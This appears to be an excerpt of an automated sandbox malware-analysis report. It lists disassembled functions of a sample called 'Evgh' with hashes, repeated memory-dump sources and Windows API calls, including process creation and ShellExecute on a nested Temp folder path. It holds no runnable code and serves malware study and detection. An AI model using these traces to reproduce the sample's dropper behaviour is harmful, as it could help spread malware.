                                                  • Instruction Fuzzy Hash: D6E04FF1A102097FEB009BA0EC05F7B7BBCE754704F404471BD01F21A0D678A8408A79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f303b90f097451caafc5c82d86dc7f8c3a5ca7b8ce6b4562ff9062d076474e9
                                                  • Instruction ID: cf83b5f92aa564cc298776c77b2bdd28f1825052710f2ecdbdb4cfcb1c159722
                                                  • Opcode Fuzzy Hash: 6f303b90f097451caafc5c82d86dc7f8c3a5ca7b8ce6b4562ff9062d076474e9
                                                  • Instruction Fuzzy Hash: 92A13171E00229CBDF28DFA8C8547ADBBB1FB44305F11816ED816BB281C7786A96CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ab636e1636351d1357f15bb4f6043d343d203a0e7e05c7e50cd2d20e4a1f53c
                                                  • Instruction ID: cdde4d58dff4e4a9c83cf0d0e57cddb7afde41a65112cf45587a3a44971c93cd
                                                  • Opcode Fuzzy Hash: 1ab636e1636351d1357f15bb4f6043d343d203a0e7e05c7e50cd2d20e4a1f53c
                                                  • Instruction Fuzzy Hash: 7A911070E04228CBDF28DF98C8547ADBBB1FB44305F15816ED816BB281C778AA96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73ca531164300be04a77f53002292f938c132f2b380a2f89a8108b3de7a2d466
                                                  • Instruction ID: 210b764e34932ffe60d6cfe39aea5744945828095a37428d8e8ad2b7e06fd55b
                                                  • Opcode Fuzzy Hash: 73ca531164300be04a77f53002292f938c132f2b380a2f89a8108b3de7a2d466
                                                  • Instruction Fuzzy Hash: 0B814671E04228CFDF24CFA8C8847ADBBB1FB44305F25816AD416BB281C7789A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d2cfe53134c7a763aaa08aff8449c0b0f7d6a132f5d25363dfe6705ba01c87a0
                                                  • Instruction ID: d8cce1150c04716a98830c198e93b549954248a52dda193404c5f2b9195ff2ae
                                                  • Opcode Fuzzy Hash: d2cfe53134c7a763aaa08aff8449c0b0f7d6a132f5d25363dfe6705ba01c87a0
                                                  • Instruction Fuzzy Hash: 89815771E04228CBDF24CFA8C8447ADBBB1FB44315F1181AED856BB281D7786A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 452643e19685fcea5462b53912e8b008e2854c88062b067f0f8fd89253b448af
                                                  • Instruction ID: 258a3fd06c35fad05ca81ab60d081a33c15d1deb970c592860f690c18264f2bd
                                                  • Opcode Fuzzy Hash: 452643e19685fcea5462b53912e8b008e2854c88062b067f0f8fd89253b448af
                                                  • Instruction Fuzzy Hash: 5D711271E04228CBDF24CFA8C8547ADBBF1FB44305F15806AD856BB281D7785A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12a72383bc36c7d96190d5e65704f25bda740c5ae2a23a9d2252c3d1e3b898a5
                                                  • Instruction ID: babde66c8cd488a95ab0ad7164d611a89d90f571a219cc2b865e3b094ddf9d96
                                                  • Opcode Fuzzy Hash: 12a72383bc36c7d96190d5e65704f25bda740c5ae2a23a9d2252c3d1e3b898a5
                                                  • Instruction Fuzzy Hash: 28712471E04228CBDF28CFA8C8547ADBBB1FB44305F15816ED856BB281C7785A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61a2e03896eecfdf1d4da445d37de20e8426d4ebfe516142fa5c4c165488df89
                                                  • Instruction ID: 6cdc3ec63689871e8710e51dd90966e3aca29af0085505062bf66b2ee05b33a6
                                                  • Opcode Fuzzy Hash: 61a2e03896eecfdf1d4da445d37de20e8426d4ebfe516142fa5c4c165488df89
                                                  • Instruction Fuzzy Hash: 25714571E04228CBDF28CF98C8547ADBBB1FB44305F11806ED856BB281C7786A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00404F16: lstrlenA.KERNEL32(rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                    • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                    • Part of subcall function 00404F16: lstrcatA.KERNEL32(rghtten,00402FCF,00402FCF,rghtten,00000000,0040E8D8,00000000), ref: 00404F72
                                                    • Part of subcall function 00404F16: SetWindowTextA.USER32(rghtten,rghtten), ref: 00404F84
                                                    • Part of subcall function 00404F16: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                    • Part of subcall function 00404F16: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                    • Part of subcall function 00404F16: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                    • Part of subcall function 0040548E: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421528,Error launching installer), ref: 004054B7
                                                    • Part of subcall function 0040548E: CloseHandle.KERNEL32(?), ref: 004054C4
                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 3521207402-0
                                                  • Opcode ID: da2ccd4dd1cfb46b1ccba28f35d19411abe0413872d754dfb7813447f57edf1f
                                                  • Instruction ID: b8d0583dc05b8a4b641891086a9cee3b9fffb48cfcfca3e9183047df695922e9
                                                  • Opcode Fuzzy Hash: da2ccd4dd1cfb46b1ccba28f35d19411abe0413872d754dfb7813447f57edf1f
                                                  • Instruction Fuzzy Hash: 6E016D31904108EBDF11AFA1C98599F7BB6EF00354F20807BFA01B52E1C7785E55DB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000002,00405E29,00000000,00000002,?,00000002,?,?,00405E29,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C0D
                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00405E29,?,00405E29), ref: 00405C2E
                                                  • RegCloseKey.KERNELBASE(?), ref: 00405C4F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                  • Instruction ID: aa1ddffca215974e7db513772cf32b94c10ac9f3b952a48a6b2e4b760bc22b34
                                                  • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                  • Instruction Fuzzy Hash: 0B01487254420AEFEB128F64ED44EEB3FACEF15354B004026F905A6220D235D964CBA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                  • RegCloseKey.KERNELBASE(?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseOpenValue
                                                  • String ID:
                                                  • API String ID: 167947723-0
                                                  • Opcode ID: 677bdc88bce3e1e7e8eb01a68c937f1af1addeb258e3eaebf081c5251f1331a7
                                                  • Instruction ID: e09e8e067f2b8771eb66943483239aed03eb61d96520190a1401bf15a77a7747
                                                  • Opcode Fuzzy Hash: 677bdc88bce3e1e7e8eb01a68c937f1af1addeb258e3eaebf081c5251f1331a7
                                                  • Instruction Fuzzy Hash: BAF0AD72A04200BFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B84A459A7A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten,?), ref: 00401E30
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten, xrefs: 00401E1B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten
                                                  • API String ID: 587946157-258341099
                                                  • Opcode ID: 2c6f028ace9ee28ba9af41cfcce1795a7e5fe9b3bc8022bb32b22207bedf057e
                                                  • Instruction ID: ee8d38ae8572f78804fc61ee43f60716403cc2376375e1dcbb8ba3fba782be0d
                                                  • Opcode Fuzzy Hash: 2c6f028ace9ee28ba9af41cfcce1795a7e5fe9b3bc8022bb32b22207bedf057e
                                                  • Instruction Fuzzy Hash: ACF02272B041007FDB10ABB19D4AF5E2AA8AB61319F20493BF141F60C2DABC88019A28
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                  • RegCloseKey.KERNELBASE(?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 3d06c792d204b5780c99020f1df9334d27262dd1fda640259017b7665588fed0
                                                  • Instruction ID: e2c7ba43779b99907ab4ed3cb5240aedb23d0abedd6968282b04b845729cd546
                                                  • Opcode Fuzzy Hash: 3d06c792d204b5780c99020f1df9334d27262dd1fda640259017b7665588fed0
                                                  • Instruction Fuzzy Hash: C7119471905205EEDF14DF64C6889AEBBB4EF11349F20843FE542B62C0D2B84A45DA5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: f500664b12d1a9ca3d846aae4db6b5f226f7dec665eeac70e15b2afbb9a011de
                                                  • Instruction ID: f7ce4a596c66e03a629b41503ee4a79f45406b0749a56119d0920da1f960bb93
                                                  • Opcode Fuzzy Hash: f500664b12d1a9ca3d846aae4db6b5f226f7dec665eeac70e15b2afbb9a011de
                                                  • Instruction Fuzzy Hash: 0E01F431B24210ABE7194B389E04B6A37A8E710314F11823BF911F66F1D7B8DC42AB4D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 00404FF8
                                                    • Part of subcall function 00403F2E: SendMessageA.USER32(00010470,00000000,00000000,00000000), ref: 00403F40
                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 00405044
